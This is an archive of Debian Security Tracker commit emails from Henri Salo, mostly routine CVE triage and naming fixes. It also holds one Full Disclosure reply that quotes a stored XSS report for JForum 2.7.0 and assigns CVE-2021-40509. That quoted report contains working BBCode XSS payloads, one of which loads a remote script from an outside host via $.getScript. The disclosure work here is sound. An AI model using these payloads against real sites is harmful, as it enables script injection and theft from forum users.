Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
53e80a2d by Henri Salo at 2021-12-06T21:21:27+02:00
NFU

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -4166,6 +4166,7 @@ CVE-2021-43411 (An issue was discovered in GNU Hurd 
before 0.9 20210404-9. When
- hurd 1:0.9.git20210404-9
 CVE-2021-43410
RESERVED
+   NOT-FOR-US: Apache Airavata
 CVE-2021-3932 (twill is vulnerable to Cross-Site Request Forgery (CSRF) ...)
NOT-FOR-US: twill
 CVE-2021-43409 (The WPO365 | LOGIN WordPress plugin (up to and 
including ...)



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/53e80a2dbb483d93dfbe6b4b548a371c98047139

-- 
View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/53e80a2dbb483d93dfbe6b4b548a371c98047139
You're receiving this email because of your account on salsa.debian.org.


___
debian-security-tracker-commits mailing list
debian-security-tracker-commits@alioth-lists.debian.net
https://alioth-lists.debian.net/cgi-bin/mailman/listinfo/debian-security-tracker-commits

[Git][security-tracker-team/security-tracker][master] NFU

2021-11-29 Thread Henri Salo (@hsalo-guest)



Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
3a9b32be by Henri Salo at 2021-11-29T20:58:42+02:00
NFU

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -65233,10 +65233,14 @@ CVE-2020-35076
REJECTED
 CVE-2020-35061
RESERVED
+CVE-2020-35037
+   NOT-FOR-US: WordPress plugin events-manager
 CVE-2020-35030
RESERVED
 CVE-2020-35017
RESERVED
+CVE-2020-35012
+   NOT-FOR-US: WordPress plugin events-manager
 CVE-2020-35001
RESERVED
 CVE-2016-15001



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/3a9b32bef3bdd79045de2442bfaf2db78487746b

-- 
View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/3a9b32bef3bdd79045de2442bfaf2db78487746b
You're receiving this email because of your account on salsa.debian.org.


___
debian-security-tracker-commits mailing list
debian-security-tracker-commits@alioth-lists.debian.net
https://alioth-lists.debian.net/cgi-bin/mailman/listinfo/debian-security-tracker-commits

[Git][security-tracker-team/security-tracker][master] CVE-2021-36749 TODO

2021-09-23 Thread Henri Salo (@hsalo-guest)



Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
d2c4dd95 by Henri Salo at 2021-09-24T07:44:39+03:00
CVE-2021-36749 TODO

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -11140,6 +11140,8 @@ CVE-2021-36750
RESERVED
 CVE-2021-36749
RESERVED
+   NOTE: https://www.openwall.com/lists/oss-security/2021/09/24/1
+   TODO: check
 CVE-2021-3650
RESERVED
 CVE-2021-3649 (chatwoot is vulnerable to Inefficient Regular Expression 
Complexity ...)



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/d2c4dd95cad217184e5f4d5999c631c0c582062e

-- 
View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/d2c4dd95cad217184e5f4d5999c631c0c582062e
You're receiving this email because of your account on salsa.debian.org.


___
debian-security-tracker-commits mailing list
debian-security-tracker-commits@alioth-lists.debian.net
https://alioth-lists.debian.net/cgi-bin/mailman/listinfo/debian-security-tracker-commits

[Git][security-tracker-team/security-tracker][master] Typo fix

2021-09-23 Thread Henri Salo (@hsalo-guest)



Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
33222c7d by Henri Salo at 2021-09-24T07:43:30+03:00
Typo fix

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -46939,37 +46939,37 @@ CVE-2021-22022 (The vRealize Operations Manager API 
(8.x prior to 8.5) contains
 CVE-2021-22021 (VMware vRealize Log Insight (8.x prior to 8.4) contains a 
Cross Site S ...)
NOT-FOR-US: VMware
 CVE-2021-22020 (The vCenter Server contains a denial-of-service vulnerability 
in the A ...)
-   NOT-FOR-US: VMWare
+   NOT-FOR-US: VMware
 CVE-2021-22019 (The vCenter Server contains a denial-of-service vulnerability 
in VAPI  ...)
-   NOT-FOR-US: VMWare
+   NOT-FOR-US: VMware
 CVE-2021-22018 (The vCenter Server contains an arbitrary file deletion 
vulnerability i ...)
-   NOT-FOR-US: VMWare
+   NOT-FOR-US: VMware
 CVE-2021-22017 (Rhttproxy as used in vCenter Server contains a vulnerability 
due to im ...)
-   NOT-FOR-US: VMWare
+   NOT-FOR-US: VMware
 CVE-2021-22016 (The vCenter Server contains a reflected cross-site scripting 
vulnerabi ...)
-   NOT-FOR-US: VMWare
+   NOT-FOR-US: VMware
 CVE-2021-22015 (The vCenter Server contains multiple local privilege 
escalation vulner ...)
-   NOT-FOR-US: VMWare
+   NOT-FOR-US: VMware
 CVE-2021-22014 (The vCenter Server contains an authenticated code execution 
vulnerabil ...)
-   NOT-FOR-US: VMWare
+   NOT-FOR-US: VMware
 CVE-2021-22013 (The vCenter Server contains a file path traversal 
vulnerability leadin ...)
-   NOT-FOR-US: VMWare
+   NOT-FOR-US: VMware
 CVE-2021-22012 (The vCenter Server contains an information disclosure 
vulnerability du ...)
-   NOT-FOR-US: VMWare
+   NOT-FOR-US: VMware
 CVE-2021-22011 (vCenter Server contains an unauthenticated API endpoint 
vulnerability  ...)
-   NOT-FOR-US: VMWare
+   NOT-FOR-US: VMware
 CVE-2021-22010 (The vCenter Server contains a denial-of-service vulnerability 
in VPXD  ...)
-   NOT-FOR-US: VMWare
+   NOT-FOR-US: VMware
 CVE-2021-22009 (The vCenter Server contains multiple denial-of-service 
vulnerabilities ...)
-   NOT-FOR-US: VMWare
+   NOT-FOR-US: VMware
 CVE-2021-22008 (The vCenter Server contains an information disclosure 
vulnerability in ...)
-   NOT-FOR-US: VMWare
+   NOT-FOR-US: VMware
 CVE-2021-22007 (The vCenter Server contains a local information disclosure 
vulnerabili ...)
-   NOT-FOR-US: VMWare
+   NOT-FOR-US: VMware
 CVE-2021-22006 (The vCenter Server contains a reverse proxy bypass 
vulnerability due t ...)
-   NOT-FOR-US: VMWare
+   NOT-FOR-US: VMware
 CVE-2021-22005 (The vCenter Server contains an arbitrary file upload 
vulnerability in  ...)
-   NOT-FOR-US: VMWare
+   NOT-FOR-US: VMware
 CVE-2021-22004 (An issue was discovered in SaltStack Salt before 3003.3. The 
salt mini ...)
- salt  (bug #994016)
NOTE: 
https://saltproject.io/security_announcements/salt-security-advisory-2021-sep-02/
@@ -46995,7 +46995,7 @@ CVE-2021-21995 (OpenSLP as used in ESXi has a 
denial-of-service vulnerability du
 CVE-2021-21994 (SFCB (Small Footprint CIM Broker) as used in ESXi has an 
authenticatio ...)
NOT-FOR-US: VMware
 CVE-2021-21993 (The vCenter Server contains an SSRF (Server Side Request 
Forgery) vuln ...)
-   NOT-FOR-US: VMWare
+   NOT-FOR-US: VMware
 CVE-2021-21992 (The vCenter Server contains a denial-of-service vulnerability 
due to i ...)
NOT-FOR-US: VMware
 CVE-2021-21991 (The vCenter Server contains a local privilege escalation 
vulnerability ...)
@@ -312285,8 +312285,8 @@ CVE-2016- [mediawiki issues from 1.26.3, 1.25.6 
and 1.23.14]
 CVE-2016-4952 (QEMU (aka Quick Emulator), when built with VMWARE PVSCSI 
paravirtual S ...)
{DLA-1599-1}
- qemu 1:2.6+dfsg-2 (bug #825210)
-   [wheezy] - qemu  (VMWare PVSCSI paravirtual device 
implementation introduced later)
-   - qemu-kvm  (VMWare PVSCSI paravirtual device 
implementation introduced later)
+   [wheezy] - qemu  (VMware PVSCSI paravirtual device 
implementation introduced later)
+   - qemu-kvm  (VMware PVSCSI paravirtual device 
implementation introduced later)
NOTE: 
https://lists.gnu.org/archive/html/qemu-devel/2016-05/msg03774.html
NOTE: Introduced in: 
http://git.qemu.org/?p=qemu.git;a=commit;h=881d588a98bf0dce98ddb65c15aa0854c0ac41ed
 (v1.5.0-rc0)
 CVE-2016-4951 (The tipc_nl_publ_dump function in net/tipc/socket.c in the 
Linux kerne ...)
@@ -375313,15 +375313,15 @@ CVE-2014-1213 (Sophos Anti-Virus engine (SAVi) 
before 3.50.1, as used in VDL 4.9
 CVE-2014-1212
RESERVED
 CVE-2014-1211 (Cross-site request forgery (CSRF) vulnerability in VMware 
vCloud Direc ...)
-   NOT-FOR-US: VMWare
+   NOT-FOR-US: VMware
 CVE-2014-1210 (VMware vSphere Client 5.0 before Update 3 and 5.1 before Update 
2

[Git][security-tracker-team/security-tracker][master] CVE-2021-41303/shiro

2021-09-17 Thread Henri Salo (@hsalo-guest)



Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
6068907e by Henri Salo at 2021-09-17T09:15:56+03:00
CVE-2021-41303/shiro

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -8,8 +8,11 @@ CVE-2021-3806
RESERVED
 CVE-2021-3805
RESERVED
-CVE-2021-41303
+CVE-2021-41303 [before 1.8.0 with Spring Boot a specially crafted HTTP request 
may cause an authentication bypass]
RESERVED
+   - shiro 
+   NOTE: https://www.openwall.com/lists/oss-security/2021/09/17/1
+   TODO: check
 CVE-2021-41302
RESERVED
 CVE-2021-41301



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/6068907eff5d15a61799f0485d0370056bbff064

-- 
View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/6068907eff5d15a61799f0485d0370056bbff064
You're receiving this email because of your account on salsa.debian.org.


___
debian-security-tracker-commits mailing list
debian-security-tracker-commits@alioth-lists.debian.net
https://alioth-lists.debian.net/cgi-bin/mailman/listinfo/debian-security-tracker-commits

[Git][security-tracker-team/security-tracker][master] NFU

2021-09-11 Thread Henri Salo (@hsalo-guest)



Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
353fae8c by Henri Salo at 2021-09-11T10:49:13+03:00
NFU

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -1640,6 +1640,7 @@ CVE-2021-40147 (EmTec ZOC before 8.02.2 allows \e[201~ 
pastes, a different vulne
NOT-FOR-US: EmTec ZOC
 CVE-2021-40146
RESERVED
+   NOT-FOR-US: Apache Any23
 CVE-2021-3738
RESERVED
 CVE-2021-3737 [client can enter an infinite loop on a 100 Continue response 
from the server]
@@ -5211,6 +5212,7 @@ CVE-2021-38556 (includes/configure_client.php in RaspAP 
2.6.6 allows attackers t
NOT-FOR-US: RaspAP
 CVE-2021-38555
RESERVED
+   NOT-FOR-US: Apache Any23
 CVE-2021-38554 (HashiCorp Vault and Vault Enterprises UI erroneously 
cached and ...)
NOT-FOR-US: HashiCorp Vault
 CVE-2021-38553 (HashiCorp Vault and Vault Enterprise 1.4.0 through 1.7.3 
initialized a ...)



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/353fae8cb7fa0cb555efe2594bc17201201b4233

-- 
View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/353fae8cb7fa0cb555efe2594bc17201201b4233
You're receiving this email because of your account on salsa.debian.org.


___
debian-security-tracker-commits mailing list
debian-security-tracker-commits@alioth-lists.debian.net
https://alioth-lists.debian.net/cgi-bin/mailman/listinfo/debian-security-tracker-commits

Re: [FD] a xss vulnerability in Jforum 2.7.0

2021-09-07 Thread Henri Salo

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

On Thu, Sep 02, 2021 at 04:55:24PM +0800, kun song wrote:
>  hi,
> 
>I found a vulnerability in the jforum 2.7.0. It is a storage cross site
> script vulnerability. The place is the user's profile - signature. The
> technique of the vulnerability is the same as that described in this
> article "STORED CROSS SITE SCRIPTING IN BBCODE" (
> https://mindedsecurity.com/advisories/msa130510/), and the POC is:
> 
> color tag:
> [color=red" onMouseOver="alert('xss')]XSS[/color]
> [color=red" onMouseOver="$.getScript('http://192.168.45.148:8080/evil.js')
> ;"]XSS[/color]
> Renders into HTML:
> XSS
> http://192.168.45.148:8080/evil.js');"
> color="red">XSS
> 
> img tag:
> [img]/demo.jpg" onMouseOver="alert('xss')[/img]
> Renders into HTML:
> 
> 
> url= tag:
> [url='http://www.demo.com; onMouseOver="alert('xss')']test[/url]
> Renders into HTML:
> http://www.demo.com; onmouseover="alert('xss')"
> target="_blank">test
> 
> through analysis, the forum has set the cookie to http-only, but the
> attacker can use the $.getScript to do some evil things.
> 
> this vulnerability has been fixed in
> https://sourceforge.net/p/jforum2/code/934/ .
> 
> timeline:
> 2021-04-21 announce the developer of Jforum by e-mail
> 2021-04-22 Jforum fixed the vulnerability, and will include this fix in
> next release
> 2021-09-02 send this mail to bugtraq

CVE-2021-40509 has been assigned for this vulnerability.

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40509

- -- 
Henri Salo
-BEGIN PGP SIGNATURE-

iQIzBAEBCgAdFiEE/aVSDznAZReWTkxKJ633pE6qdXQFAmE3GGgACgkQJ633pE6q
dXRbUA//fgeWQCIQzYDgZ6venNplzRBsCamTVWK2miur4NjIqKFtza4namiEn1GK
9+Fw4llZdmcdLV2iE5HVo1EPwg1RKgKqEFWlat8cLNWyzPFazh3Mv8gJgAAPnfgB
HdODZGE8cXnTZ2nK1FZqTtGbh7vTcs9AlWzpEwZgZs+BzWzX6VO/gxC2iQcA4ePq
6/xKsUbO46SKZpZ+pZt45V9r4EcibgU69cXwtPeywE2NRjlM9VsReWz+p3CVR3Sv
px6mK3G4sjyHyPIhkDwVMwUziPT5FfLuAPYI6VEweMsCUgyUfj48xu+pmTYwCQ1R
8LSjllEU2qsGvs0oMGs7AEp5T1c/kDP7xgS761gUivjl1J//szu+QScC0jKYVdEX
DWp672UpzB3F4xsMTeQu7U7zq+NRS2ySNs3gB2cvqsjS8lDIMdrnThqZny/K7jhC
TCrfTYDTsej1jlMWR3mTiFIhNNhPPoSg+Opab1wnqQwO3JIE9xVqNNTsyIH+aCMK
jUlZZAbJwfb3WNJMJHI+9gxh1XgLf5NhgsSlzSpWcnM/soXOYzi3EdYlvuc0cTQ7
X3082dHC7A2Y1Lm9fTqvwsQ+BGV0rR8FxhwAfqweNz7AH5rAIbalj+mVFweSaUU/
k2Vd4Jt8QjfmzaTMMpLxUPjA3vlaIBxYnz/T33chZ119PRG9vNc=
=fWS4
-END PGP SIGNATURE-

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[Git][security-tracker-team/security-tracker][master] Typo fix

2021-08-31 Thread Henri Salo (@hsalo-guest)



Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
b9d501b4 by Henri Salo at 2021-08-31T23:16:36+03:00
Typo fix

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -43540,17 +43540,17 @@ CVE-2021-22029
 CVE-2021-22028
RESERVED
 CVE-2021-22027 (The vRealize Operations Manager API (8.x prior to 8.5) 
contains a Serv ...)
-   NOT-FOR-US: Vmware
+   NOT-FOR-US: VMware
 CVE-2021-22026 (The vRealize Operations Manager API (8.x prior to 8.5) 
contains a Serv ...)
-   NOT-FOR-US: Vmware
+   NOT-FOR-US: VMware
 CVE-2021-22025 (The vRealize Operations Manager API (8.x prior to 8.5) 
contains a brok ...)
-   NOT-FOR-US: Vmware
+   NOT-FOR-US: VMware
 CVE-2021-22024 (The vRealize Operations Manager API (8.x prior to 8.5) 
contains an arb ...)
-   NOT-FOR-US: Vmware
+   NOT-FOR-US: VMware
 CVE-2021-22023 (The vRealize Operations Manager API (8.x prior to 8.5) has 
insecure ob ...)
-   NOT-FOR-US: Vmware
+   NOT-FOR-US: VMware
 CVE-2021-22022 (The vRealize Operations Manager API (8.x prior to 8.5) 
contains an arb ...)
-   NOT-FOR-US: Vmware
+   NOT-FOR-US: VMware
 CVE-2021-22021 (VMware vRealize Log Insight (8.x prior to 8.4) contains a 
Cross Site S ...)
NOT-FOR-US: VMware
 CVE-2021-22020
@@ -116134,13 +116134,13 @@ CVE-2020-5430
 CVE-2020-5429
REJECTED
 CVE-2020-5428 (In applications using Spring Cloud Task 2.2.4.RELEASE and 
below, may b ...)
-   NOT-FOR-US: Vmware
+   NOT-FOR-US: VMware
 CVE-2020-5427 (In Spring Cloud Data Flow, versions 2.6.x prior to 2.6.5, 
versions 2.5 ...)
-   NOT-FOR-US: Vmware
+   NOT-FOR-US: VMware
 CVE-2020-5426 (Scheduler for TAS prior to version 1.4.0 was permitting 
plaintext tran ...)
-   NOT-FOR-US: Vmware
+   NOT-FOR-US: VMware
 CVE-2020-5425 (Single Sign-On for Vmware Tanzu all versions prior to 1.11.3 
,1.12.x v ...)
-   NOT-FOR-US: Vmware
+   NOT-FOR-US: VMware
 CVE-2020-5424
REJECTED
 CVE-2020-5423 (CAPI (Cloud Controller) versions prior to 1.101.0 are 
vulnerable to a  ...)
@@ -414475,7 +414475,7 @@ CVE-2011-3869 (Puppet 2.7.x before 2.7.5, 2.6.x 
before 2.6.11, and 0.25.x allows
{DSA-2314-1}
- puppet 2.7.3-3
 CVE-2011-3868 (Buffer overflow in VMware Workstation 7.x before 7.1.5, VMware 
Player  ...)
-   NOT-FOR-US: Vmware
+   NOT-FOR-US: VMware
 CVE-2011-3867
REJECTED
 CVE-2011-3866 (Mozilla Firefox before 7.0 and SeaMonkey before 2.4 do not 
properly re ...)
@@ -463779,7 +463779,7 @@ CVE-2008-2098 (Heap-based buffer overflow in the 
VMware Host Guest File System (
NOTE: vmware-package just builds vmware from downloaded tarballs, the 
package itself
NOTE: does not download them, however it needs to update its hashes for 
upstream tarballs
 CVE-2008-2097 (Buffer overflow in the openwsman management service in VMware 
ESXi 3.5 ...)
-   NOT-FOR-US: Vmware ESX/i
+   NOT-FOR-US: VMware ESX/i
 CVE-2008-2096 (SQL injection vulnerability in BackLinkSpider allows remote 
attackers  ...)
NOT-FOR-US: BackLinkSpider
 CVE-2008-2095 (SQL injection vulnerability in index.php in the FlippingBook 
(com_flip ...)



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/b9d501b4589bd0d9b29be1313ae3e51fb6d8286c

-- 
View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/b9d501b4589bd0d9b29be1313ae3e51fb6d8286c
You're receiving this email because of your account on salsa.debian.org.


___
debian-security-tracker-commits mailing list
debian-security-tracker-commits@alioth-lists.debian.net
https://alioth-lists.debian.net/cgi-bin/mailman/listinfo/debian-security-tracker-commits

[Git][security-tracker-team/security-tracker][master] NFU

2021-08-18 Thread Henri Salo (@hsalo-guest)



Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
f892867d by Henri Salo at 2021-08-18T10:03:30+03:00
NFU

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -12789,6 +12789,7 @@ CVE-2021-33581
RESERVED
 CVE-2021-33580
RESERVED
+   NOT-FOR-US: Apache Roller
 CVE-2021-33586 (InspIRCd 3.8.0 through 3.9.x before 3.10.0 allows any user 
(able to co ...)
- inspircd 3.8.1-2 (bug #989144)
[buster] - inspircd  (Vulnerable code not present)



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/f892867da16ef576b4d35f50293e9ee7f2a5e1b9

-- 
View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/f892867da16ef576b4d35f50293e9ee7f2a5e1b9
You're receiving this email because of your account on salsa.debian.org.


___
debian-security-tracker-commits mailing list
debian-security-tracker-commits@alioth-lists.debian.net
https://alioth-lists.debian.net/cgi-bin/mailman/listinfo/debian-security-tracker-commits

[Git][security-tracker-team/security-tracker][master] Unify product name

2021-08-14 Thread Henri Salo (@hsalo-guest)



Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
5a78f2b2 by Henri Salo at 2021-08-14T11:47:42+03:00
Unify product name

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -77620,7 +77620,7 @@ CVE-2020-18465
 CVE-2020-18464 (Cross Site Request Forgery (CSRF) vulnerability in AikCms 
2.0.0 in vid ...)
NOT-FOR-US: AikCms
 CVE-2020-18463 (Cross Site Request Forgery (CSRF) vulnerability exists in 
v2.0.0 in vi ...)
-   NOT-FOR-US: aikcms
+   NOT-FOR-US: AikCms
 CVE-2020-18462 (File Upload vulnerabilty in AikCms v2.0.0 in poster_edit.php 
because t ...)
NOT-FOR-US: AikCms
 CVE-2020-18461



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/5a78f2b293247d8b8d0f513a31a901d1464317c0

-- 
View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/5a78f2b293247d8b8d0f513a31a901d1464317c0
You're receiving this email because of your account on salsa.debian.org.


___
debian-security-tracker-commits mailing list
debian-security-tracker-commits@alioth-lists.debian.net
https://alioth-lists.debian.net/cgi-bin/mailman/listinfo/debian-security-tracker-commits

[Git][security-tracker-team/security-tracker][master] NFU

2021-07-27 Thread Henri Salo (@hsalo-guest)



Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
48874a43 by Henri Salo at 2021-07-27T23:22:24+03:00
NFU

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -93460,6 +93460,7 @@ CVE-2020-11511 (The LearnPress plugin before 3.2.6.9 
for WordPress allows remote
NOT-FOR-US: LearnPress plugin for WordPress
 CVE-2020-11510
RESERVED
+   NOT-FOR-US: LearnPress plugin for WordPress
 CVE-2020-11509 (An XSS vulnerability in the WP Lead Plus X plugin through 0.98 
for Wor ...)
NOT-FOR-US: WP Lead Plus X plugin for WordPress
 CVE-2020-11508 (An XSS vulnerability in the WP Lead Plus X plugin through 0.98 
for Wor ...)



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/48874a43c7c7c75bbe1ca2083beb9933dc32e502

-- 
View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/48874a43c7c7c75bbe1ca2083beb9933dc32e502
You're receiving this email because of your account on salsa.debian.org.


___
debian-security-tracker-commits mailing list
debian-security-tracker-commits@alioth-lists.debian.net
https://alioth-lists.debian.net/cgi-bin/mailman/listinfo/debian-security-tracker-commits

[Git][security-tracker-team/security-tracker][master] CVE-2021-33900/apacheds

2021-07-24 Thread Henri Salo (@hsalo-guest)



Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
7adc1d9f by Henri Salo at 2021-07-24T12:54:54+03:00
CVE-2021-33900/apacheds

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -7840,6 +7840,9 @@ CVE-2021-33901
RESERVED
 CVE-2021-33900
RESERVED
+   - apacheds 
+   NOTE: https://www.openwall.com/lists/oss-security/2021/07/24/1
+   TODO: check
 CVE-2020-36384 (PageLayer before 1.3.5 allows reflected XSS via color 
settings. ...)
NOT-FOR-US: PageLayer
 CVE-2020-36383 (PageLayer before 1.3.5 allows reflected XSS via the font-size 
paramete ...)



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/7adc1d9f04061be3f19169636c98efa1cb81f972

-- 
View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/7adc1d9f04061be3f19169636c98efa1cb81f972
You're receiving this email because of your account on salsa.debian.org.


___
debian-security-tracker-commits mailing list
debian-security-tracker-commits@alioth-lists.debian.net
https://alioth-lists.debian.net/cgi-bin/mailman/listinfo/debian-security-tracker-commits

[Git][security-tracker-team/security-tracker][master] CVE-2021-32746, CVE-2021-32747/icinga2

2021-07-13 Thread Henri Salo (@hsalo-guest)



Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
ca3732e7 by Henri Salo at 2021-07-13T21:14:03+03:00
CVE-2021-32746, CVE-2021-32747/icinga2

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -8943,9 +8943,11 @@ CVE-2021-32749
 CVE-2021-32748
RESERVED
 CVE-2021-32747 (Icinga Web 2 is an open source monitoring web interface, 
framework, an ...)
-   TODO: check
+   - icinga2 
+   NOTE: 
https://github.com/Icinga/icingaweb2/security/advisories/GHSA-2xv9-886q-p7xx
 CVE-2021-32746 (Icinga Web 2 is an open source monitoring web interface, 
framework and ...)
-   TODO: check
+   - icinga2 
+   NOTE: 
https://github.com/Icinga/icingaweb2/security/advisories/GHSA-cmgc-h4cx-3v43
 CVE-2021-32745
RESERVED
 CVE-2021-32744



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/ca3732e76942db10d59751a3802b80eca2fbdd23

-- 
View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/ca3732e76942db10d59751a3802b80eca2fbdd23
You're receiving this email because of your account on salsa.debian.org.


___
debian-security-tracker-commits mailing list
debian-security-tracker-commits@alioth-lists.debian.net
https://alioth-lists.debian.net/cgi-bin/mailman/listinfo/debian-security-tracker-commits

[Git][security-tracker-team/security-tracker][master] NFU

2021-07-13 Thread Henri Salo (@hsalo-guest)



Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
37842898 by Henri Salo at 2021-07-13T21:12:00+03:00
NFU

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -29250,13 +29250,13 @@ CVE-2021-2
 CVE-2021-24443
RESERVED
 CVE-2021-24442 (The Poll, Survey, Questionnaire and Voting system WordPress 
plugin bef ...)
-   TODO: check
+   NOT-FOR-US: Wordpress plugin
 CVE-2021-24441 (The Sign-up Sheets WordPress plugin before 1.0.14 does not not 
sanitis ...)
-   TODO: check
+   NOT-FOR-US: Wordpress plugin
 CVE-2021-24440 (The Sign-up Sheets WordPress plugin before 1.0.14 did not 
sanitise or  ...)
-   TODO: check
+   NOT-FOR-US: Wordpress plugin
 CVE-2021-24439 (The Browser Screenshots WordPress plugin before 1.7.6 allowed 
authenti ...)
-   TODO: check
+   NOT-FOR-US: Wordpress plugin
 CVE-2021-24438
RESERVED
 CVE-2021-24437
@@ -29266,7 +29266,7 @@ CVE-2021-24436
 CVE-2021-24435
RESERVED
 CVE-2021-24434 (The Glass WordPress plugin through 1.3.2 does not sanitise or 
escape i ...)
-   TODO: check
+   NOT-FOR-US: Wordpress plugin
 CVE-2021-24433
RESERVED
 CVE-2021-24432
@@ -29276,29 +29276,29 @@ CVE-2021-24431
 CVE-2021-24430
RESERVED
 CVE-2021-24429 (The Salon booking system WordPress plugin before 6.3.1 does 
not proper ...)
-   TODO: check
+   NOT-FOR-US: Wordpress plugin
 CVE-2021-24428
RESERVED
 CVE-2021-24427 (The W3 Total Cache WordPress plugin before 2.1.3 did not 
sanitise or e ...)
-   TODO: check
+   NOT-FOR-US: Wordpress plugin
 CVE-2021-24426 (The Backup by 10Web  Backup and Restore Plugin 
WordPress plugin ...)
-   TODO: check
+   NOT-FOR-US: Wordpress plugin
 CVE-2021-24425
RESERVED
 CVE-2021-24424 (The WP Reset  Most Advanced WordPress Reset Tool 
WordPress plug ...)
-   TODO: check
+   NOT-FOR-US: Wordpress plugin
 CVE-2021-24423
RESERVED
 CVE-2021-24422
RESERVED
 CVE-2021-24421 (The WP JobSearch WordPress plugin before 1.7.4 did not 
sanitise or esc ...)
-   TODO: check
+   NOT-FOR-US: Wordpress plugin
 CVE-2021-24420 (The Request a Quote WordPress plugin before 2.3.4 did not 
sanitise and ...)
-   TODO: check
+   NOT-FOR-US: Wordpress plugin
 CVE-2021-24419 (The WP YouTube Lyte WordPress plugin before 1.7.16 did not 
sanitise or ...)
-   TODO: check
+   NOT-FOR-US: Wordpress plugin
 CVE-2021-24418 (The Smooth Scroll Page Up/Down Buttons WordPress plugin 
through 1.4 do ...)
-   TODO: check
+   NOT-FOR-US: Wordpress plugin
 CVE-2021-24417
RESERVED
 CVE-2021-24416



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/37842898f539651e11f9ceb0c5143217c2633f50

-- 
View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/37842898f539651e11f9ceb0c5143217c2633f50
You're receiving this email because of your account on salsa.debian.org.


___
debian-security-tracker-commits mailing list
debian-security-tracker-commits@alioth-lists.debian.net
https://alioth-lists.debian.net/cgi-bin/mailman/listinfo/debian-security-tracker-commits

[Git][security-tracker-team/security-tracker][master] NFU

2021-07-13 Thread Henri Salo (@hsalo-guest)



Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
2f28e868 by Henri Salo at 2021-07-13T21:10:09+03:00
NFU

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -29316,9 +29316,9 @@ CVE-2021-24411
 CVE-2021-24410
RESERVED
 CVE-2021-24409 (The Prismatic WordPress plugin before 2.8 does not escape the 
'tab' GE ...)
-   TODO: check
+   NOT-FOR-US: Wordpress plugin
 CVE-2021-24408 (The Prismatic WordPress plugin before 2.8 does not sanitise or 
validat ...)
-   TODO: check
+   NOT-FOR-US: Wordpress plugin
 CVE-2021-24407 (The Jannah WordPress theme before 5.4.5 did not properly 
sanitize the  ...)
NOT-FOR-US: Wordpress theme
 CVE-2021-24406 (The wpForo Forum WordPress plugin before 1.9.7 did not 
validate the re ...)
@@ -29364,7 +29364,7 @@ CVE-2021-24387 (The WP Pro Real Estate 7 WordPress 
theme before 3.1.1 did not pr
 CVE-2021-24386 (The WP SVG images WordPress plugin before 3.4 did not sanitise 
the SVG ...)
NOT-FOR-US: Wordpress plugin
